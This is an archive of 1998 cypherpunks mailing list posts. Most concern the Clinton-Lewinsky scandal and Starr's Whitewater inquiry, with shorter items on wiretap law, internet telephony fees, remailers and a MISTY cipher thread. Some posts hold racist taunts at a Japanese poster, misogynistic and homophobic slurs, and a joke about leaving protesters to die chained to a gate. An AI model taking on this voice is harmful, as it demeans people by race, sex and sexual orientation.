> individuals, however, with whom I am familiar by way of the media, it is
> accurate - and eerie, to say the least.
> 
> 
> 
> 
> 
> ***************************************************************************
> Lynne L. Harrison, Esq.         |  "If we are all here,
> Poughkeepsie, New York          |   then we are not
> mailto:lharrison@dueprocess.com |   all there."
> http://www.dueprocess.com       |      - old Zen saying
> *************************************************************************
> 
> DISCLAIMER:  I am not your attorney; you are not my client.
>              Accordingly, the above is *NOT* legal advice.
> 
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 14 Sep 1998 09:30:36 +0800
To: "Lynne L. Harrison" <cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <3.0.5.32.19980914032054.007d3b40@pop.mhv.net>
Message-ID: <v03130306b222d8bbc4d6@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:20 AM -0700 9/14/98, Lynne L. Harrison wrote:
>> On Sat, 12 Sep 1998, Tim May wrote:
>>
>> There's also the idea popular in some gender feminist circles that the
>> imbalance of power in manager-employee relationships makes it impossible
>> for genuine consent to be given. Can there be any greater power imbalance
>> than the president of the United States and an intern? Where are the
>> feminist cries of outrage?
>

Just to be clear, I didn't write any of the above that was attributed to
me. Declan wrote it.

I don't even know what a "gender feminist" is.  Some kind of typical
feminazi or feminista screwball, I assume.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Soren <sorens@workmail.com>
Date: Mon, 14 Sep 1998 06:50:28 +0800
To: cypherpunks@cyberpass.net
Subject: Re: MISTY encryption algorithm source code
In-Reply-To: <19980913230004.14914.qmail@nym.alias.net>
Message-ID: <35FD02A6.6473F7D0@workmail.com>
MIME-Version: 1.0
Content-Type: text/plain

 

lcs Mixmaster Remailer wrote:
Nobuki Nakatuji wrote:

> MISTY source code posted by me at long ago had many mistake.
> Attachment file are revised MISTY source code and revised readme.
> Thanks.
>
>
> ______________________________________________________
> Get Your Private, Free Email at http://www.hotmail.com

BRAIN used by you always since at long ago have many insect. Attachment
brain not here because was exhausted in decypher you message. You go
back
at Hotmail now and stop spam Cypherpunks list. Chop chop.
And of course we know that this list should be the exclusive province of
white-boys-who-speak-american-english.  Give us all a laugh, and attempt
saying that in Japanese.  BTW, get the culture for your cultural slurs
correct.  The etymology of chop chop is Shanghai, late 19th century. 
A chop is an engraved ideogram representing a non-forgeable signature -
sort of a smartcard.  Hence chop chop, translates as "sign on the
dotted line and get on with the deal". Taking this a little further, chopsticks
are so-called because they usually bear the 'chop' of the eating house
from whence you stole them.  Needless to say, the chinese don't call
them that. This is akin to messages to you, being in spanish because your
neighbors to the south speak it.  I suspect Nakatuji-san is entirely
'misty'fied by your random cultural references. Unless you haven't realized,
the internet actually exists outside of the Union of Shortsighted Assholes. 
Perhaps you'd be happier returning to your nakama on Assholes On-Line?  
Here's a self-study course,
on asian anatomical and cultural differences, for your perusal.

"Educate, don't agitate"
 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Mon, 14 Sep 1998 07:28:12 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: McDougal denied medical aid prior to death [CNN] (fwd)
Message-ID: <199809141249.HAA24512@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From ravage@ssz.com Mon Sep 14 07:49:25 1998
From: Jim Choate <ravage@ssz.com>
Message-Id: <199809141249.HAA24500@einstein.ssz.com>
Subject: McDougal denied medical aid prior to death [CNN]
To: users@ssz.com (SSZ User Mail List)
Date: Mon, 14 Sep 1998 07:49:23 -0500 (CDT)
Cc: friends@ssz.com (Ravage's Friends)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 2034      


Forwarded message:

> X-within-URL: http://www.cnn.com/US/9809/14/mcdougal.report.ap/

>    McDougal September 14, 1998
>    Web posted at: 2:21 a.m. EDT (0621 GMT)
>    
>    FORT WORTH, Texas (AP) -- Whitewater witness James McDougal did not
>    have access to his heart medication in the hours before he died in
>    prison, a federal government report revealed.
>    
>    McDougal, a former business partner of President Clinton who later
>    agreed to testify for Independent Counsel Ken Starr, also was not seen
>    by a doctor although he complained of feeling ill the day before his
>    death, according to a report obtained by the Fort Worth Star-Telegram
>    under the Freedom of Information Act.
>    
>    McDougal was moved from his regular cell to solitary confinement at
>    the Federal Medical Center prison in Fort Worth a day before his death
>    as punishment for failing to provide a urine sample for a drug test.
>    
>    McDougal had complained of being unable to provide urine for drug
>    tests because of the medications he took for a variety of ailments.
>    
>    During the move, guards did not find McDougal's heart medication
>    because they did not want to search McDougal's regular cell and
>    disturb his sleeping cell mate, the report said.
>    
>    One of the medicines, nitroglycerin, could have bought McDougal some
>    time after he suffered a heart attack, a prison official who asked not
>    to be identified said in the Sunday paper.

[text deleted]


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 14 Sep 1998 11:05:35 +0800
To: raymond@fbn.bc.ca
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809120319.UAA20709@leroy.fbn.bc.ca>
Message-ID: <35FD3C1F.514C@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



>If the game looks too rough who do you blame?
>
Nice point. 

> I see the whole OIC crusade against Clinton as an attempt to bring
> honesty to government.  Ken Starr is just playing the game by the
> rules set out be the Clintons.  
>
But I guess I can't quite buy into it because I see no first order
differences between the Republocrats and the Demicans. The whole thing
looks to me like a redefinition of the rules of engagement in the same
old power struggle. Hardly Control vs. Kaos.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Mon, 14 Sep 1998 10:28:16 +0800
To: "Petro" <declan@well.com>
Subject: RE: Clinton's fake apologies
In-Reply-To: <v03110709b222df0b20fe@[206.189.103.244]>
Message-ID: <000101bddff3$d5e14840$9f2580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



What chance is there that the Paula Jones case was dismissed BECAUSE Wild
Bill lied under oath?

Remember OJ?

X

-----Original Message-----
From:	owner-cypherpunks@minder.net [mailto:owner-cypherpunks@minder.net] On
Behalf Of Petro
Sent:	Monday, September 14, 1998 9:03 AM
To:	Jim Gillogly; declan@well.com
Cc:	cypherpunks@cyberpass.net
Subject:	Re: Clinton's fake apologies

At 10:49 AM -0500 9/12/98, Jim Gillogly wrote:
>IANAL (feel free to weigh in here, Unicorn), but I heard on one show or
>another that lying under oath is perjury only if it's material to the
>suit.  Since the Jones case was dismissed, it was argued that even if he
>lied then, it wasn't material and thus wasn't perjury -- they claimed that
>nobody had every been convicted of perjury for lying in a case that was
>dismissed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Mon, 14 Sep 1998 10:15:15 +0800
To: declan@well.com
Subject: Re: Clinton's fake apologies
In-Reply-To: <199809121549.IAA28683@zendia.mentat.com>
Message-ID: <v03110709b222df0b20fe@[206.189.103.244]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:49 AM -0500 9/12/98, Jim Gillogly wrote:
>Declan wrote:
>> On Fri, 11 Sep 1998, Jim Gillogly wrote:
>> >
>> > If they <do> decide this is now a requirement for high office, I'd like
>> > to see all the Congresscritters who've had sex out of wedlock and
>> > concealed it take one step forward.  Shall we make hypocrisy in high
>> > office impeachable also?
>>
>> A better question is: If Clinton is guilty of perjury and other felonies,
>> should he be impeached?
>
>IANAL (feel free to weigh in here, Unicorn), but I heard on one show or
>another that lying under oath is perjury only if it's material to the
>suit.  Since the Jones case was dismissed, it was argued that even if he
>lied then, it wasn't material and thus wasn't perjury -- they claimed that
>nobody had every been convicted of perjury for lying in a case that was
>dismissed.  Of course he's saying he didn't even lie: like Kinky Friedman

	Whether anyone was convicted or not, he still LIED UNDER OATH
(Allegedly, allegedly allegedly). It doesn't matter whether the case was
dismissed or not.

>In any case, despite these legalisms, I'm not convinced that perjury in
>any case should be considered treason or high crimes and misdemeanors.

	He VIOLATED HIS OATH OF OFFICE.

>The Founding Fathers could have been more specific about what was
>impeachable, and they chose not to be, leaving it intentionally ambiguous.
>
>Despite those arguments, this stuff really isn't about perjury: it's about
>the Republicans' case of nixon envy... Clinton's peccadillos are a far cry
>from Watergate (or Teapot Dome or Iran-Contra), but it's the best chance
>they've had since the Crook was dumped.

	Yeah, Nixon only worked to conceal the actions of others,
attempting to protect himself, and the people who worked for him. He did
this concerning a crime he did not know was going to be committed.

	Clinton on the other hand LIED UNDER OATH about something HE DID,
lied to PROTECT HIMSELF, and ONLY HIMSELF. At least Nixon worried about
more than his historical legacy, and his wee-willy.

>> If you don't think about lying about sex and related issues under oath
>> should be a crime, well, then change the law. But right now any form of
>> lying under oath is perjury, whether you like it or not.
>If he did commit perjury, would that be an impeachable offense?  I claim
>it's up to the House to interpret just what constitutes high crimes and
>misdemeanors, since it isn't spelled out in the Constitution.
>
>Disclaimer -- I'm not a Democrat, and I'm annoyed with Clinton's behavior
>on crypto issues.  If I appear to be defending him, it's inadvertant -- I
>just feel he should be attacked on material points rather than whatever
>sleazy stuff Starr has found under his rocks.

	As it's been said before, if he'll lie UNDER OATH about this, what
about other things?

--
petro@playboy.com----for work related issues. I don't speak for Playboy.
petro@bounty.org-----for everthing else.      They wouldn't like that.
                                              They REALLY
Economic speech IS political speech.          wouldn't like that.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 14 Sep 1998 12:16:19 +0800
To: "Lynne L. Harrison" <cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <Pine.GSO.3.95.980914063037.25313E-100000@well.com>
Message-ID: <v03130308b222fe51994a@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:24 AM -0700 9/14/98, Lynne L. Harrison wrote:

>I don't see a power imbalance here.  If a young woman in her 20's
>invitingly flashes her thong panties at a man, I don't see how she can be
>portrayed as the victim.  The only way that the issue of power arises is
>that Monica was not overwhelmed by someone in power - she was attracted to
>the power.

I agree, in principle. But, then, I think _most_ so-called sexual
harassment cases are based on an inappropriate use of state power to
intervene in birds and the bees issues.

Of course, the Lewinsky stuff surfaced as a result of a civil action filed
by Paula Jones, claiming Clinton dropped his pants in front of her, invited
her to do things to him, etc., etc., blah blah. Did Jones invite this? Was
she attracted to power? Who knows? This is what the trial was presumably
about. And Clinton lied about the Lewinsky matter, and probably has lied
about a great many other matters.

(IANAL, as a few of you are, but I assumed the Lewinsky stuff was coming in
to support allegations of a pattern of such behaviors. If Jones alone had
made the case, it might have been a "she said, he said" case, but when
strikingly parallel behavior turns up with several other women....)

And did Kathleen Willey invite Clinton to rub up against her and suggest an
afternoon quickie in his office? She claimed on "60 Minutes" not to have
invited his behavior.

I'm as bothered as the next person that a taxpayer-funded prosecutor is
asking questions about sex lives. However, this is what comes of having
"sexual harassment" laws, with "if she said it happened, it _happened_"
standards of proof.

Like I said, I'm chortling. What goes around, come around.

And I'm happy that lying sack of shit of a President may escape being
removed from office. Having him around is a useful reminder, the next best
thing to the useful policy of letting a corpse hang from the gallows for a
couple of months.

--Tim May



(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 14 Sep 1998 12:48:09 +0800
To: cypherpunks@Algebra.COM
Subject: Re: 023026.htm
In-Reply-To: <199809140625.CAA00774@demona.doldrums.dyn.ml.org>
Message-ID: <35FD539C.75BD@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



>    FBI, has cleared it for export because the system allows access to
>    specific documents for which an appropriate court order has been
>    issued. The company expects the product to be received warmly
>    overseas, since the U.S. government cannot decode information at 
>    will.
Pardon me if I'm a bit slow here but isn't this just a less
space-efficient form of key escrow? Shouldn't you keep the pad secret
and then trash it after use? 

And if a pad is distributed using a traditional encryption system isn't
the security of the "OTP" then the same as the method used to send it? 
Don't you need secret agents handcuffed to briefcases to distribute real
OTPs?

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Mon, 14 Sep 1998 12:38:36 +0800
To: cypherpunks@cyberpass.net
Subject: "If a woman says it happened, it _happened_"
In-Reply-To: <v03110709b222df0b20fe@[206.189.103.244]>
Message-ID: <v03130309b223012342d9@[209.66.100.123]>
MIME-Version: 1.0
Content-Type: text/plain




...unless of course that woman is not politically correct.


At 8:24 AM -0700 9/14/98, X wrote:
>What chance is there that the Paula Jones case was dismissed BECAUSE Wild
>Bill lied under oath?
>
>Remember OJ?
>

You mean you think if Clinton had told the truth when he raised his hand
and swore to tell the truth it might have made a difference?

"Well, huh, like, I used to bring these young thangs in, invite them in to
meet the Governor, and then give them a chance to look at General Lee as he
stands up to attention. Ya know, this was why I ran for Governor, to get
some of that government-approved nookie. And when I moved up to
Washtington, whoooo-wheeeeeeee! Let's see, I "interviewed" Kathleen Willey
for that intern job, the same day her husband offed himself, so, like, she
wouldn't put out. But I told her my fly was alway open for her. And then
there was that little intern with the beret...don't quite recollect her
name. Mona, I think, and boy did she ever moan..."

Think the truth might have made Paula Jones' tale of Clinton dropping trou
on her just a little more plausible?

Apparently most Americans now believe her, and they didn't before. The last
8 months has established a clear-cut pattern.

But, as I said, having Clinton hanging around is good for the process of
disgracing our government officials. Think of how many world leaders will
burst into laughter, or disgust, when he offers them a cigar?

And it will make it awfully tough for the next round of feministas
screaming that some CEO must go because he had a fling with his secretary.
And maybe Mitsubishi of America will cancel the multimillion dollar
settlement reached with a bunch of women who claimed to have been offended
by the sexist jokes of Mitsubishi's Japanese managers. If Clinton can get
blowjobs from his underlings, and use government money to set up
assignations and to run cover for him, where's the fun in zapping Japanese
execs for making hooters jokes?

Kind of reminds me of the disconnect between one batch of lesbos screaming
that a male only college must be opened to all womyn while another batch of
bald-headed dykes in Calfornia screams that Mills College must remain a
wimmin-only haven for sistas and queers. Some of these baldies chained
themselves to the gates...hey, why weren't they just left chained up? The
shriveled corpses might have served as a reminder to others.

--Tim May

(This space left blank pending determ. of acceptability to the gov't.)
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Mon, 14 Sep 1998 13:54:12 +0800
To: cypherpunks@Algebra.COM
Subject: [NYT] FCC Extends CALEA Deadline
Message-ID: <3.0.5.32.19980914104107.0089f220@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



>From the New Yawk Times, probably Friday or Saturday:
WIRETAP DELAYED - [New York Times, C14.] In a setback for the F.B.I., 
the Federal Communications Commission has given the telecommunications 
industry an additional 20 months to comply with a 
Federal law meant to bring law-enforcement surveillance into the
digital age. But in extending the deadline the commission deferred 
action on some of the most disputed facets of the issue, which has pitted
law-enforcement officials against telephone-equipment manufacturers, 
network-service providers and privacy-rights advocates. 
The Communications Assistance for Law Enforcement Act was intended to 
address complaints by the F.B.I. and local law-enforcement agencies
that were rapidly losing their ability to conduct wiretaps and other 
forms of electronic surveillance in the face of modern digital and 
wireless communications networks. But industry groups had long warned 
that they would be unable to meet the approaching deadline for complying
with the law by installing the software and hardware that would allow 
for court-authorized surveillance on modern networks. 
The F.C.C. extended the deadline to June 30, 2000. 
"This ruling is really a prelude to the privacy fight," said James X. Dempsey, 
a telecommunications expert. "For now the commission has given itself 
and the industry some breathing room. They've said, 
'Don't rush into these additional surveillance areas.'" 
The decision came in response to a request for a deadline extension 
that was filed in March in a joint petition by AT&T
Wireless Services, Lucent Technologies and Ericsson. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Mon, 14 Sep 1998 12:54:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re:
In-Reply-To: <199809131855.UAA18056@replay.com>
Message-ID: <35FD554C.7E00@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
> 
> How about a line-of-sight (LOS) infrared network, a neighbor-net?
> ...
> They'd probably want to regulate the
> traffic over a taut string, between paper cups.
>
I think we should add separate keys to drivers licenses that authorize
one to purchase plumbing components, red meat, optical components,
electronics devices, ammo, porno...just add it to a 2D barcode. It would
not be any inconvenience at all.

It looks like to get any significant distance you would want substantial
power. Then a possible downfall would be "unsafe use of a laser." I
think this is what was used some years back when people started playing
around with laser eavesdropping devices. It makes no difference whether
or not the power levels or use are actually dangerous: in the minds of
most :

#define LASER \
( Spectre + evil_conspiracy + guys_in_labcoats + flash_fried )

Call lots of optics guys who would show how misalignment could cause
stray reflections, eye specialists to talk about retinas etc...still a
good idea for *local* neighborhood. Have you got any specific info on
what is already commercially available? 

BTW - It would probably be easy to map one of these nets using an
appropriate imaging device because there would be a number of sources of
stray light. Turn on the right camera and the spiderweb shows up. I see
a plane going overhead at night, a little upwind, dispersing a fine,
*harmless* dust, storing away a few frames of data as the dust drifts
across the landscape...

You could easily cut a coax into the turf bewteen two houses. The
hardest thing to track or shut down would be a distributed system that
had some unpredictable bridges in it. Build a FrankenNet - sewn together
from all sorts of obscure pieces. 

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Wed, 16 Sep 1998 06:46:27 +0800
To: cypherpunks@Algebra.COM
Subject: [NYT] Bell-South charging access fees for phone-over-Internet
Message-ID: <3.0.5.32.19980914104601.008b0a10@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



INTERNET FEES CHARGED - [New York Times, C5.] Ever since
April, when the Federal Communications Commission reported
to Congress that telephone calls made from one phone to
another using the Internet could become subject to network
access fees, the industry has been waiting for a test case.
BellSouth has now provided the test. The company has written
to a half-dozen Internet service providers in its region saying
that in November, BellSouth will start levying access fees for
voice conversations the Internet companies transmit. The fees
are the same sort that local phone companies like BellSouth
charge to AT&T and MCI for connecting calls to the local
network. Internet traffic has never been subject to such fees. But
the Internet telephony companies are not ready to give in. In
some ways, BellSouth's move may be largely symbolic, since
most Internet voice traffic so far involves attempts to avoid the
high charges for international long-distance calls, in which local
access fees are a relatively minor part of the price. And yet,
BellSouth is trying to close what many in the telephone industry
have seen as a loophole in networking pricing regulations. 
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Mon, 14 Sep 1998 06:23:58 +0800
To: cypherpunks@toad.com
Subject: Re: Remailers
Message-ID: <3472f166e843de1880a781de2ecd3050@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On <hell if I know when> nnburk <nnburk@cobain.hdc.net> wrote:

>Are _any_ of the remailers working?

Take a look at the remailer stats.

http://anon.efga.org/~rlist/rlist.html
http://anon.efga.org/~rlist/mlist.html

Kinda obvious really huh?


 -+DiGiTaL+-


Greets to AOHell 3l33T HaCkerz - the badest dudes ever!
 (yeah, they probably have root on your machine now!)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 14 Sep 1998 10:59:32 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: IP: Impeachment Petition -- NOT!
In-Reply-To: <199809140329.UAA27182@netcom13.netcom.com>
Message-ID: <35FD3C3C.EC8102E6@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



So much for this being a working thing:

Anyone else get a bounce?

Date: Mon, 14 Sep 1998 11:20:14 -0400
From: System Administrator <postmaster@mail.house.gov>
To: sunder@sundernet.com
Subject: Undeliverable: Impeach Clinton Now!


Your message did not reach some or all of the intended recipients.

      To:       tmanton@mail.house.gov
      Subject:  Impeach Clinton Now!
      Sent:     9/14/98 11:20:14 AM

The following recipient(s) could not be reached:

      tmanton@mail.house.gov on 9/14/98 11:20:14 AM
            Recipient Not Found
            MSEXCH:IMC:U.S. House of Representatives:U.S. House:MSG05



Vladimir Z. Nuri wrote:
> 
> From: vols-fan@juno.com (Football Fan)
> Subject: IP: Impeachment Petition
> Date: Sat, 12 Sep 1998 22:59:15 -0500
> To: baldmccoy@prodigy.net, PiercedEar@juno.com, TTMCCOY@juno.com, psm127_dad@mailcity.com, phmitch@mindspring.com, stringtickler@hotmail.com, Jimjean5013@juno.com, laney@arkansas.net, JESSICA.HARDAGE@charleston.af.mil, teyze-barbi@juno.com, rjohnson@bstream.com, iarthuriarthur@juno.com, w-t-14@juno.com, Bripowell@nidlink.com, supertrician@juno.com, barsotti@bstream.com
> 
> http://congress.nw.dc.us/impeach/petition.html
> 
> **********************************************
> To subscribe or unsubscribe, email:
>      majordomo@majordomo.pobox.com
> with the message:
>      (un)subscribe ignition-point email@address
> **********************************************
> www.telepath.com/believer
> **********************************************

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Tue, 15 Sep 1998 02:07:01 +0800
To: Martin Minow <cypherpunks@cyberpass.net
Subject: Re: U.S. House only has a T-1
In-Reply-To: <Pine.LNX.3.96.980911124049.451C-100000@jb3.fastrans.net>
Message-ID: <3.0.5.32.19980914115857.008a9820@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 11:55 AM 9/11/98 -0700, Martin Minow wrote:
>>From Jim Burns:
>>Is there any effort underway to mirror the report to various
>>archives?  This is going to kill the DC internet corridor
>>otherwise.
>>
>What I heard on the radio this morning was that the house
>will press CD's that will be distributed to mirror servers
>(presumably the major Internet news providers.)

Sigh.  These folks don't understand the web technology
(though I suppose sneakernetting CDs to Washington press corps
may actually be the fastest way for some things,
but the press corps and the press companies' webmasters
aren't the same folks.)
It'd be simpler for them to distribute the report,
and similar high-popularity information in the future,
using electronic distribution to the various press agencies
and other high-volume web sites, as long as they
coordinate it well.  It might also make sense for them to have a
"press-only" subnet for insiders and major caching proxy servers to get 
distributions from.

>Now, the real interesting question: will the files be
>PGP-signed?

What?  And make it hard to change them later?  :-)



				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Lynne L. Harrison" <lharrison@dueprocess.com>
Date: Mon, 14 Sep 1998 11:22:48 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Clinton--Why I am Chortling
In-Reply-To: <3.0.5.32.19980914032054.007d3b40@pop.mhv.net>
Message-ID: <3.0.5.32.19980914122452.0086a750@pop.mhv.net>
MIME-Version: 1.0
Content-Type: text/plain



At 06:32 AM 9/14/98 -0700, Declan McCullagh wrote:
>Careful with your attributions. I don't believe Tim wrote what you said he
>did.

And at 07:31 AM 9/14/98 -0700, Tim May wrote:
>Just to be clear, I didn't write any of the above that was attributed to
>me. Declan wrote it.
>I don't even know what a "gender feminist" is.  Some kind of typical
>feminazi or feminista screwball, I assume.

My mistake.  Sometimes when you're reading a post that's been re-quoted
several times, it gets confusing as to who posted what.

>As for Monica-Clinton, what appears to be the case doesn't matter in some
>ideologies. Can meaningful consent be given with such a power imbalance?
>-Declan

I don't see a power imbalance here.  If a young woman in her 20's
invitingly flashes her thong panties at a man, I don't see how she can be
portrayed as the victim.  The only way that the issue of power arises is
that Monica was not overwhelmed by someone in power - she was attracted to
the power.

On another but connected note, explain why Monica saved that dress!  I
found this little tidbit to be the "yuck" factor...



***********************************************************
Lynne L. Harrison, Esq.           |    "The key to life:
Poughkeepsie, New York            |     - Get up;
mailto:lharrison@dueprocess.com   |     - Survive;
http://www.dueprocess.com         |     - Go to bed."
***********************************************************

DISCLAIMER:  I am not your attorney; you are not my client.
             Accordingly, the above is *NOT* legal advice.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 14 Sep 1998 12:12:15 +0800
To: cypherpunks@cyberpass.net
Subject: All Fall Down...
Message-ID: <v04011705b222fc4c12d7@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Delivered-To: ignition-point@majordomo.pobox.com
X-Sender: believer@telepath.com
Date: Mon, 14 Sep 1998 09:40:16 -0500
To: believer@telepath.com
From: believer@telepath.com
Subject: IP: Whitewater Probe Continues
Mime-Version: 1.0
Sender: owner-ignition-point@majordomo.pobox.com
Precedence: list
Reply-To: believer@telepath.com

Source:  Washington Times
http://www.WashTimes.com/news/news2.html#link

Starr continues Whitewater investigation

 By Jerry Seper
 THE WASHINGTON TIMES

Kenneth W. Starr's case for impeaching President Clinton
 is only the first public accounting in a massive ongoing
 investigation --contrary to White House claims that the
 Whitewater probe is dead.

"All phases of the investigation are now nearing
 completion," the 445-page report says.

The independent counsel "will soon make final decisions
 about what steps to take, if any, with respect to the other
 information it has gathered."

While it was Mr. Starr's "strong desire" to complete the
 entire Whitewater inquiry before giving any information to
 Congress, the report said, it "became apparent" there was
 "substantial and credible information" of impeachable offenses
 and he was required under the law to refer the information to
 Congress as soon as possible.

"It also became apparent that a delay of this referral until the
 evidence from all phases of the investigation had been
 evaluated would be unwise," the report said.

Mr. Starr will soon make decisions on final reports to a
 three-judge panel of the U.S. Circuit Court of Appeals for the
 D.C. Circuit and possible indictments, the report added.

Mr. Clinton's personal attorney, David E. Kendall, attacked
 the Monica Lewinsky report this week as a
 "hit-and-run smear campaign," saying it was nothing but an
 attempt to damage the president with "irrelevant and
 unnecessary graphic and salacious allegations." He asked,
 "Where's Whitewater?"

But the report's introduction notes that Mr. Starr's four-year
 Whitewater probe, all but forgotten in the crush of sordid
 public revelations of Mr. Clinton's sexual dalliances with the
 former White House intern, continues to target a number of
 areas:

Legal representation of a failed Arkansas thrift, Madison
Guaranty Savings and Loan Association, and a real
estate project, Castle Grande, by first lady Hillary
Rodham Clinton and former Rose Law Firm partner
Webster L. Hubbell, the ex-associate attorney general
who resigned in disgrace.

The firing of seven White House travel office employees
to make room for Clinton cronies, and the role Mrs.
Clinton may have played in the decision.

The delivery to the White House of more than 1,000
secret FBI files on Reagan and Bush administration
aides, and efforts to shield White House officials,
including Mrs. Clinton, from a public accounting on how
the files were obtained and used.

The misuse of personnel records of Pentagon employee
Linda R. Tripp, whose secret recordings of
conversations with Miss Lewinsky began the grand jury
investigation.

Possible perjury and obstruction of justice concerning an
incident involving former White House volunteer
Kathleen E. Willey. Mrs. Willey said in August 1997
that Mr. Clinton made sexual advances in the Oval
Office in November 1993.

The Starr report to Congress said Miss Lewinsky told the
 president Newsweek was working on an article about Mrs.
 Willey. Mr. Clinton dismissed the accusations as "ludicrous,
 because he would never approach a small-breasted woman
 like Mrs. Willey." Later he asked Miss Lewinsky if she had
 heard about the Newsweek inquiry from Mrs. Tripp, to which
 she replied "yes."

The former intern said Mr. Clinton asked if Mrs. Tripp
 could be trusted and then told her to persuade Mrs. Tripp to
 call White House Deputy Counsel Bruce R. Lindsey about the
 matter. Newsweek published the Willey story on Aug. 11,
 1997. In his Jan. 17 deposition in the Paula Jones case, Mr.
 Clinton denied the Willey accusation.

The Starr probe also is looking into accusations that efforts
 were made to silence Mrs. Willey. Among those drawing
 attention is Democratic fund-raiser Nathan Landow.
 Investigators want to know if he urged Mrs. Willey to deny she
 was groped by the president. Mrs. Willey has since testified
 before the Lewinsky grand jury as a cooperating witness.

Mr. Landow testified before the grand jury, later telling
 reporters he took the Fifth Amendment. His daughter, former
 White House volunteer Harolyn Cardozo, who worked with
 Mrs. Willey, also testified.

In "Travelgate" and "Filegate," papers filed earlier this month
 in federal court in Washington show the investigations "are
 continuing and in extremely sensitive stages." Deputy
 independent counsel Robert Bittman told the court the probes
 had reached to the "highest level of the federal government"
 and involved "issues of singular constitutional and historic
 importance."

The Whitewater probe also is examining whether Mr.
 Hubbell hid his involvement and that of Mrs. Clinton with
 Castle Grande, a real estate project south of Little Rock, Ark.

